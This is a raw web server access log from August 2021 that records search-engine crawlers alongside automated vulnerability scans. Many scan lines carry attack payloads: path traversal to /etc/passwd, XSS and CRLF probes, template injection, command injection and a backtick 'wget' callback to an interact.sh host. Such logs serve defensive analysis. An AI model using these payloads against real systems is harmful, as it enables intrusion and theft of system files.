66.249.70.30 - - [09/Aug/2021:22:09:59 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.3 - - [09/Aug/2021:22:09:59 +0200] "GET /index.php?m=polkmiu&id=12302 HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.163.163.20 - - [09/Aug/2021:23:12:46 +0200] "GET /mongo-express/ HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [09/Aug/2021:23:22:23 +0200] "GET /mongo-express/ HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [10/Aug/2021:02:56:46 +0200] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [10/Aug/2021:03:06:29 +0200] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
114.119.157.178 - - [10/Aug/2021:03:25:06 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
66.249.70.95 - - [10/Aug/2021:05:29:02 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.93 - - [10/Aug/2021:05:29:02 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.163.163.20 - - [10/Aug/2021:06:45:31 +0200] "GET /phpmyadmin/index.php?db=information_schema HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [10/Aug/2021:06:55:13 +0200] "GET /phpmyadmin/index.php?db=information_schema HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
51.15.35.105 - - [10/Aug/2021:07:21:46 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.249.70.95 - - [10/Aug/2021:13:30:43 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.3 - - [10/Aug/2021:14:53:46 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.28 - - [10/Aug/2021:14:53:46 +0200] "GET /index.php?m=polkmiu&id=15699 HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.30 - - [10/Aug/2021:16:06:04 +0200] "GET /index.php?m=polkmiu&id=16325 HTTP/1.1" 401 741 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.156.84 - - [11/Aug/2021:00:57:26 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
209.126.7.138 - - [11/Aug/2021:02:01:30 +0200] "GET /wp-login.php HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
209.126.7.138 - - [11/Aug/2021:02:01:30 +0200] "GET /wp-login.php HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
209.126.7.138 - - [11/Aug/2021:02:01:30 +0200] "GET /wp-login.php HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
209.126.7.138 - - [11/Aug/2021:02:01:30 +0200] "GET /wp-login.php HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
114.119.155.88 - - [11/Aug/2021:04:18:39 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
37.187.132.114 - - [11/Aug/2021:06:39:17 +0200] "GET /wp-login.php HTTP/1.1" 401 704 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
37.187.132.114 - - [11/Aug/2021:06:39:17 +0200] "GET /wp-login.php HTTP/1.1" 401 704 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
37.187.132.114 - - [11/Aug/2021:06:39:17 +0200] "GET /wp-login.php HTTP/1.1" 401 704 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
37.187.132.114 - - [11/Aug/2021:06:39:17 +0200] "GET /wp-login.php HTTP/1.1" 401 704 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.15.235.181 - - [11/Aug/2021:07:23:18 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.249.70.91 - - [11/Aug/2021:08:16:19 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.93 - - [11/Aug/2021:08:16:20 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.95 - - [11/Aug/2021:09:42:31 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.30 - - [11/Aug/2021:12:34:25 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.28 - - [11/Aug/2021:12:34:25 +0200] "GET /index.php?m=polkmiu&id=15580 HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.163.163.20 - - [11/Aug/2021:22:46:42 +0200] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [11/Aug/2021:23:03:41 +0200] "GET /theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
66.249.70.28 - - [12/Aug/2021:00:34:04 +0200] "GET /index.php?m=polkmiu&id=rataj HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.191.171.5 - - [12/Aug/2021:00:43:58 +0200] "GET /robots.txt HTTP/1.1" 401 700 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.3 - - [12/Aug/2021:00:43:59 +0200] "GET /index.php?m=Bibliografia HTTP/1.1" 401 700 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
114.119.135.32 - - [12/Aug/2021:01:20:14 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.15.64.111 - - [12/Aug/2021:07:24:50 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.249.70.93 - - [12/Aug/2021:11:05:44 +0200] "GET /robots.txt HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.91 - - [12/Aug/2021:11:05:44 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.93 - - [12/Aug/2021:12:09:01 +0200] "GET / HTTP/1.1" 401 737 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.119 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.3 - - [12/Aug/2021:13:10:11 +0200] "GET /robots.txt HTTP/1.1" 401 741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.3 - - [12/Aug/2021:13:10:11 +0200] "GET /index.php?m=polkmiu&id=13283 HTTP/1.1" 401 740 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.70.91 - - [12/Aug/2021:13:50:56 +0200] "GET /index.php?m=polkmiu&id=17723 HTTP/1.1" 401 737 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.163.163.20 - - [12/Aug/2021:13:56:28 +0200] "GET /FAKE_PATH HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
194.163.163.20 - - [12/Aug/2021:14:10:28 +0200] "GET /FAKE_PATH HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
137.74.150.112 - - [12/Aug/2021:16:28:14 +0200] "GET / HTTP/1.1" 401 700 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
137.74.150.112 - - [12/Aug/2021:16:30:15 +0200] "GET / HTTP/1.1" 401 704 "-" "httpx - Open-source project (github.com/projectdiscovery/httpx)"
137.74.150.112 - - [12/Aug/2021:16:31:52 +0200] "GET /loginLess/../../etc/passwd HTTP/1.1" 400 487 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:31:52 +0200] "GET /admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 538 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:31:53 +0200] "POST /service/rapture/session HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:31:53 +0200] "GET /install/ HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:31:53 +0200] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:31:54 +0200] "GET / HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:00 +0200] "GET /loginLess/../../etc/passwd HTTP/1.1" 400 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:00 +0200] "GET /admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:01 +0200] "GET /install/ HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:01 +0200] "GET /pods HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:01 +0200] "GET /cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:01 +0200] "POST /service/rapture/session HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:02 +0200] "GET / HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:02 +0200] "GET /api/v1/pods HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:05 +0200] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:06 +0200] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 401 700 "-" "Nacos-Server"
137.74.150.112 - - [12/Aug/2021:16:32:14 +0200] "GET /pods HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:15 +0200] "GET /api/v1/pods HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:23 +0200] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:32:24 +0200] "POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1" 401 704 "-" "Nacos-Server"
137.74.150.112 - - [12/Aug/2021:16:33:41 +0200] "GET /cgi-bin/test/test.cgi HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:33:47 +0200] "GET /cgi-bin/test/test.cgi HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:33:48 +0200] "POST /casmain.xgi HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:33:49 +0200] "GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:33:54 +0200] "GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
137.74.150.112 - - [12/Aug/2021:16:33:54 +0200] "POST /webtools/control/xmlrpc HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:33:55 +0200] "POST /casmain.xgi HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:33:55 +0200] "GET /ui/vropspluginui/rest/services/getstatus HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:34:01 +0200] "GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:34:01 +0200] "POST /webtools/control/xmlrpc HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:34:07 +0200] "POST /login.php HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:34:08 +0200] "POST /login.php HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:34:09 +0200] "POST /cli.php?a=shell HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:34:24 +0200] "POST /login.php HTTP/1.1" 401 704 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:34:25 +0200] "POST /login.php HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:34:26 +0200] "POST /cli.php?a=shell HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:35:35 +0200] "GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:35:38 +0200] "GET /wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 401 704 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
137.74.150.112 - - [12/Aug/2021:16:35:41 +0200] "GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2Fc4aj1prsbhjcp79q7tp0crkudseyyyysg.interact.sh%60 HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36, Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:35:47 +0200] "GET /search?search_key={{1337*1338}} HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:35:50 +0200] "GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:35:51 +0200] "GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2Fc4aj1prsbhjcp79q7tp0crkudaayyybrg.interact.sh%60 HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36, Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:35:52 +0200] "GET /search?search_key={{1337*1338}} HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:35:55 +0200] "POST /filemanager/upload.php HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:35:58 +0200] "GET /lib///....//....//....//....//....//....//....//....//etc//passwd HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:36:00 +0200] "GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1 HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:36:00 +0200] "POST /filemanager/upload.php HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:36:07 +0200] "GET /poc.txt HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:36:11 +0200] "GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../poc.txt&id=1 HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:36:18 +0200] "GET /poc.txt HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:36:05 +0200] "POST /service/extdirect HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:36:11 +0200] "POST /service/extdirect HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:36:20 +0200] "POST /service/extdirect HTTP/1.1" 401 704 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:03 +0200] "GET /.json HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:03 +0200] "GET /.1.json HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:04 +0200] "GET /....4.2.1....json HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:04 +0200] "GET /.json?FNZ.css HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:04 +0200] "GET /.json?FNZ.ico HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:05 +0200] "GET /.json?FNZ.html HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:05 +0200] "GET /.json/FNZ.css HTTP/1.1" 401 700 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:05 +0200] "GET /.json/FNZ.html HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:06 +0200] "GET /.json/FNZ.png HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:06 +0200] "GET /.json/FNZ.ico HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
137.74.150.112 - - [12/Aug/2021:16:37:07 +0200] "GET /.children.1.json HTTP/1.1" 401 700 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
